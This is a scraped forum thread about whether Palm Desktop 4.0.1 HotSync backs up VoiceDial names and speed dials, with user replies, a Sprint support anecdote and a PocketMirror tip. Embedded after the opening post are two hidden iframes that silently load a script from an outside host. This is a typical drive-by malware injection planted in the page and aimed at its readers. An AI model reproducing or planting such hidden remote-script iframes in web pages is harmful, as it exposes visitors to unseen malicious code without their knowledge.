+ Reply to Thread

Thread: VoiceDial sync

VoiceDial sync

Does Palm desktop allow for syncing and storing the voice dial names on the desktop? I was just looking at my palm's hotsync program, in the "Conduit Setup" menu, and one of the conduit check boxes is VoiceDial, but my software does not backup my voicedial names. How can this be done?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

are you using palm desktop 4.0.1? this should save the voice #'s... it does save all of your user installed apps.

From what I've noticed the voice memo's and voice dialing don't get backed up to the Palm desktop 4.0.1. My original phone caused multiple resets / hard resets and I noticed these two items were not being restored.

I called Sprint technical support and I was told "I guess it's not perfect".

Another thing for people using PocketMirror. Your speed dial information doesn’t get backed-up or restored once you start using PocketMirror.

Darren

Originally posted by Marctronixx
    are you using palm desktop 4.0.1? this should save the voice #'s... it does save all of your user installed apps.
    Marc:
    I have seen you say that voice dial and speed dials are saved with the 4.0.1 desktop, but for some reason this does not work for me. Did you have to do something special to set this up. I have abandon voice dialing because it is a pain to set up every time I have to do a hard reset.
    Carl

Administrator

Arrow

thats why i had "should" in italics.. on the 6035 it did! i only did a cold reset once when i uped the software in the phone (the colod reset was required)..
    however, i have non t had to do one on the i300 and i was uner the *assumption* that this phone would save those also. it seems after hearing from you guys that it does not.. pocket mirror wil let them be saved as i used this exact same 4.0.1 and conduits.

old habits die hard... :o